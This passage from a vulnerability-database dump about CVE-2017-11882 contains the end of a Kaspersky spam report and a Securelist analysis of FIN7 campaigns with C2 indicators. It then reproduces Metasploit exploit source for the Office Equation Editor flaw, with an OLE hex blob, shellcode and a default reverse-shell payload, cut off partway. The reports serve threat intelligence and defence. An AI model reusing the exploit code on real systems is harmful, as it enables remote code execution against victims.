as in the previous quarter, went to [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (8.03%).\n\n### Countries targeted by malicious mailshots\n\n_Distribution of Mail Anti-Virus triggerings by country, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094333/08-en-spam-report-q3-2020.png>))_\n\nSince the beginning of the year, Spain has led the way by number of Mail Anti-Virus triggerings. In Q3, users in this country accounted for 7.76% of attacks. In second place this time was Germany (7.05%), knocking Russia (5.87%) into third.\n\n## Statistics: phishing\n\nIn Q3 2020, the Anti-Phishing system prevented **103,060,725** attempts to redirect users to fake pages, which is almost **3.2 million** fewer than in Q2. The share of unique attacked users amounted to **7.67%** of the total number of users of Kaspersky products\n\n### Attack geography\n\nThis time, the country with the largest proportion of users attacked by phishers was Mongolia (15.54%).\n\n_Geography of phishing attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094409/09-en-spam-report-q3-2020.png>))_\n\nIsrael (15.24%) lies close behind in second place, with France (12.57%) this time in third.\n\n### Top-level domains\n\nThe most popular top-level domain with phishers this quarter, as before, was COM (40.09% of the total number of top-level domains used in attacks). Silver went to XYZ (5.84%), and bronze to NET (3.00%). RU finished in fourth place (2.93%), and BUZZ in fifth (2.57%).\n\n_Top-level domains most popular with phishers, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094443/10-en-spam-report-q3-2020.png>))_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by the Kaspersky Anti-Phishing component. This component detects pages with phishing content that the user tried to access by following email or web links, regardless of how the user got to the page: by clicking a link in a phishing email or in a message on a social network, or after being redirected by a malicious program. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nAs before, the Online Stores category absorbed the most phishing attacks, despite its share dropping slightly against Q2 2020 (by 0.20 p.p.) to 19.22%. Global Web Portals (14.48%) in second position and Banks (10.89%) in third were also non-movers.\n\n_Distribution of organizations subjected to phishing attacks by category, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094523/11-en-spam-report-q3-2020.png>))_\n\n## Conclusion\n\nThe COVID-19 topic, which appeared in Q1 this year, is still in play for spammers and phishers. In our view, the so-called second wave could lead to a surge in mailings offering various coronavirus-related treatments. Moreover, against the backdrop of the worsening economic situation, we could see a rise in the number of scam mailings promising a big payout in exchange for a small upfront sum.\n\nThe average share of spam in global mail traffic (48.91%) this quarter decreased by 1.27 p.p. against the previous reporting period, while the number of attempted redirects totaled nearly 103 million.\n\nFirst place in the list of spam-source countries in Q3 again went to Russia, with a share of 23.52%. Our security solutions blocked 51,025,889 malicious attachments; the most popular malware family in spam mailings was Trojan-PSW.MSIL.Agensla, with a 12.67% share of mail traffic.", "modified": "2020-11-12T10:00:54", "published": "2020-11-12T10:00:54", "id": "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "href": "https://securelist.com/spam-and-phishing-in-q3-2020/99325/", "type": "securelist", "title": "Spam and phishing in Q3 2020", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\nOn August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts.\n\nIn 2018-2019, researchers of Kaspersky Lab's Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.\n\n## **Recent FIN7 campaigns**\n\nThe FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.\n\n### **Malicious Documents**\n\nWe have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim's computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as \"12345\", \"1234\", etc., uses macros to execute a GRIFFON implant on the target's computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.\n\nInterestingly, following some open-source publications about them, the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows these to modify different IOCs, such as the filenames of wscript.exe or sctasks.exe copies, etc.\n\n**wscript.exe copy** | **sctasks copy** | **Task name** | **C2** \n---|---|---|--- \n**byzNne10.exe** | byzNne17.exe | TaskbyzNne | logitech-cdn.com \nc9FGG10.exe | c9FGG17.exe | Taskc9FGG | logitech-cdn.com \n**zEsb10.exe** | zEsb17.exe | TaskzEsb | servicebing-cdn.com \n \nIOCs extracted from docs which use sctasks for GRIFFON persistence\n\n**Author** | **Company** | **wscript.exe copy** | **C2** \n---|---|---|--- \nmogjxjtvte | mogjxjtvte | mswmex44.exe | logitech-cdn[.]com \nsoxvremvge | soxvremvge | c9FGG10.exe | logitech-cdn[.]com \ngareljtjhvd | gareljtjhvd | zEsb10.exe | servicebing-cdn[.]com \n \nIOCs extracted from regular documents associated to GRIFFON\n\n### **GRIFFON Implant**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144433/sas-fin-7-1.png>)\n\n_Griffon Malware attack pattern_\n\nThe GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.\n\n#### **Reconnaissance module**\n\nThe first module downloaded by the GRIFFON malware to the victim's computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation's monitors.\n\n#### **Meterpreter downloader**\n\nThe second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as \"_Tinymet_\". This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute.\n\n#### **Screenshot module**\n\nThe third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at \"%TMP%/image.png\", sent back to the attackers by the GRIFFON implant and then deleted.\n\n#### **Persistence module**\n\nThe last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim's workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \"file-less\" aspect of this method.\n\nThrough its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim's workstation.\n\n## **On the hunt for GRIFFON infrastructure**\n\nAttackers make mistakes, and FIN7 are no exception. The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators created fake HTTP 302 redirection to various Google services on their C2s servers.\n \n \n HTTP/1.1 302 Found\n Server: nginx\n Date: [retracted]\n Content-Type: text/html; charset=UTF-8\n Content-Length: 0\n Connection: keep-alive\n Location: https://cloud.google.com/cdn/\n\n**Returned headers for most of the GRIFFON C2s servers on port 443**\n\nThis error allowed us to follow the infrastructure week by week, until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking against their infrastructure.\n\n### **Fake pentest company**\n\nDuring the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.\n\nAccording to the website, that domain supposedly belongs to a legitimate security company \"fully owned by the Russian Government\" (sic.) and having offices in \"Moscow, Saint Petersburg and Yekaterinburg\", but the address says the company is located in Trump Tower, in New York. Given FIN7's previous use of false security companies, we decided to look deeper into this one.\n\nAs we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:\n\n * DKSec \u2013 www.dksec.com\n * OKIOK \u2013 www.okiok.com/services/tailored-solutions\n * MainNerve \u2013 www.mainnerve.com\n * Datics \u2013 www.datatics.com/cyber-security\n * Perspective Risk \u2013 www.perspectiverisk.com\n * Synack \u2013 https://www.synack.com/company\n * FireEye \u2013 https://www.fireeye.com/services/penetration-testing.html\n\nThis company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.\n\nIn addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.\n\n## **Links to other intrusion sets**\n\nWhile tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.\n\n### **CobaltGoblin/EmpireMonkey**\n\nIn his history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims' networks. After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.\n\nFIN7's last campaigns were targeting banks in Europe and Central America. This threat actor stole [suspected of stealing](<https://www.timesofmalta.com/articles/view/20190225/local/how-bov-hackers-got-away-with-13-million.702800>) \u20ac13 million from Bank of Valetta, Malta earlier this year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07150038/sas-fin-7-2.png>)\n\nExample of malicious documents used in the end of 2018 to beginning of 2019\n\nA few interesting overlaps in recent FIN7 campaigns:\n\n * Both used macros to copy wscript.exe to another file, which began with \"ms\" (mses.exe \u2013 FIN7, msutil.exe \u2013 EmpireMonkey).\n * Both executed a JScript file named \"error\" in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).\n * Both used DocuSign decoy documents with different macros. The macros popped the same \"Document decryption error\" error message\u2014even if macro code remain totally different.\n\nWe have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.\n\n### **AveMaria**\n\nAveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.\n\nTo deliver their malware, the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. What is interesting, in some emails, they ask targets to phone them if they have any questions, like the FIN7 guys do.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144536/sas-fin-7-4.png>)\n\nExample of AveMaria spearphing emails. Criminals suggest calling them.\n\nDuring the investigation into FIN7, our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria. Basically, two servers in the same IP range and AS14576 (autonomous system) share a non-standard SSH port, which is 222. One of the servers is a Griffon C2, and the other one, an AveMaria C2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144550/sas-fin-7-5.png>)\n\nDistribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144612/sas-fin-7-6.png>)\n\n### **CopyPaste**\n\nAt the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity that we temporarily called \"CopyPaste\" from a previously unknown APT. Interestingly, this actor targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center.\n\nThis set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim's networks and avoid detection.\n\nHere are the main similarities between CopyPaste and FIN7:\n\n * Both used the same Microsoft PowerShell argument obfuscation order: \"powershell.exe -NoP -NonI -ExecutionPolicy Bypass\". We have only seen FIN7 and CopyPaste use this argument list for executing their malicious Powershell Scripts.\n * Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digitcert and Microsoft websites and used decoy job employment and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt used decoy 302 HTTP redirections too, FIN7 on its GRIFFON C2s before January 2018, and Cobalt, on its staging servers, similar to CopyPaste.\n * Quite recently, FIN7 threat actors typosquatted the brand \"Digicert\" using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as a Powershell Empire C2 with decoy HTTP 302 redirects to the legitimate Digicert website.\n\nThe links between CopyPaste and FIN7 are still very weak. It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.\n\n## **Conclusions**\n\nDuring 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader will have an impact on the group's operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various level of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.\n\nThe first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit, techniques and similar infrastructure but targets only financial institutions and associated software/services providers.\n\nWe link the AveMaria botnet to these two groups with medium confidence: AveMaria's targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.\n\nAll of the aforementioned groups greatly benefit from unpatched systems in corporate environments. They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.\n\nFIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company \"Combi Security\", we are confident that they continue to create new personas for use in either targeting or recruiting under a \"new\" brand, \"IPC\".\n\nMore information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com\n\n## **Indicators of compromise**\n\n#### **AveMaria**\n\n * 185.61.138.249\n * tain.warzonedns[.]com\n * noreply377.ddns[.]net\n * 185.162.131.97\n * 91.192.100.62\n * server.mtcc[.]me\n * doddyfire.dyndns[.]org\n * 212.8.240.116\n * 168.167.45.162\n * toekie.ddns[.]net\n * warmaha.warzonedns[.]com\n\n#### **CopyPaste**\n\n * digi-cert[.]org\n * somtelnetworks[.]com\n * geotrusts[.]com\n * secureclientupdate[.]com\n * digicertweb[.]com\n * sport-pesa[.]org\n * itaxkenya[.]com\n * businessdailyafrica[.]net\n * infotrak-research[.]com\n * nairobiwired[.]com\n * k-24tv[.]com\n\n#### **FIN7/GRIFFON**\n\n * hpservice-cdn[.]com\n * realtek-cdn[.]com\n * logitech-cdn[.]com\n * pci-cdn[.]com\n * appleservice-cdn[.]com\n * servicebing-cdn[.]com\n * cisco-cdn[.]com\n * facebook77-cdn[.]com\n * yahooservices-cdn[.]com\n * globaltech-cdn[.]com\n * infosys-cdn[.]com\n * google-services-s5[.]com\n * instagram-cdn[.]com\n * mse-cdn[.]com\n * akamaiservice-cdn[.]com\n * booking-cdn[.]com\n * live-cdn2[.]com\n * cloudflare-cdn-r5[.]com\n * cdnj-cloudflare[.]com\n * bing-cdn[.]com\n * servicebing-cdn[.]com\n * cdn-yahooapi[.]com\n * cdn-googleapi[.]com\n * googl-analytic[.]com\n * mse-cdn[.]com\n * tw32-cdn[.]com\n * gmail-cdn3[.]com\n * digicert-cdn[.]com\n * vmware-cdn[.]com\n * exchange-cdn[.]com\n * cdn-skype[.]com\n * windowsupdatemicrosoft[.]com\n * msdn-cdn[.]com\n * testing-cdn[.]com\n * msdn-update[.]com\n\n#### **EmpireMonkey/CobaltGoblin**\n\n_In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names._\n\n * (entity)-corporate[.]com\n * (entity)-cert[.]com\n * (entity)-no[.]org\n * (entity)-fr[.]org\n * (entity)-acquisition[.]org\n * (entity)-trust[.]org\n * riscomponents[.]pw\n * nlscdn[.]com", "modified": "2019-05-08T10:00:04", "published": "2019-05-08T10:00:04", "id": "SECURELIST:163368D119719D834280EA969EDB785D", "href": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", "type": "securelist", "title": "FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-09T21:28:48", "description": "This Metasploit module exploits a flaw in how the Equation Editor handles OLE objects in memory to execute arbitrary code using RTF files without interaction.", "edition": 1, "published": "2017-12-06T00:00:00", "type": "zdt", "title": "Microsoft Office Equation Editor Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2017-12-06T00:00:00", "href": "https://0day.today/exploit/description/29119", "id": "1337DAY-ID-29119", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Office CVE-2017-11882',\r\n 'Description' => %q{\r\n Module exploits a flaw in how the Equation Editor that\r\n allows an attacker to execute arbitrary code in RTF files without\r\n interaction. The vulnerability is caused by the Equation Editor,\r\n to which fails to properly handle OLE objects in memory.\r\n },\r\n 'Author' => ['mumbai', 'embedi'],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Nov 15 2017',\r\n 'References' => [\r\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\r\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' => [\r\n ['Microsoft Office', {} ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Payload' => {\r\n 'DisableNops' => true\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\r\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\r\n ])\r\n end\r\n\r\n def retrieve_header(filename)\r\n if (not datastore['FOLDER_PATH'].nil?)\r\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\r\n else\r\n path = nil\r\n end\r\n if (not path.nil?)\r\n if ::File.file?(path)\r\n File.open(path, 'rb') do |fd|\r\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\r\n header = header.to_s # otherwise I get nil class...\r\n print_status(\"Injecting #{path}...\")\r\n return header\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n return header\r\n end\r\n\r\n\r\n\r\n def generate_rtf\r\n header = retrieve_header(datastore['FILENAME'])\r\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\r\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\r\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\r\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\r\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\r\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\r\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\r\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\r\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\r\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\r\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\r\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\r\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\r\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\r\n\r\n\r\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\r\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\r\n shellcode << \"\\x9e\" # 6: 9e sahf\r\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\r\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\r\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\r\n shellcode << \"\\\\\" # 12: 5c pop esp\r\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\r\n shellcode << \"\\xee\" # 15: ee out dx,al\r\n shellcode << \"[\" # 16: 5b pop ebx\r\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\r\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\r\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\r\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\r\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\r\n shellcode << 